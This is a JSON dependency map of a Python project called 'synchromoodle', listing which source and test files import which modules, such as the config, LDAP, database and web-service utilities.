| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.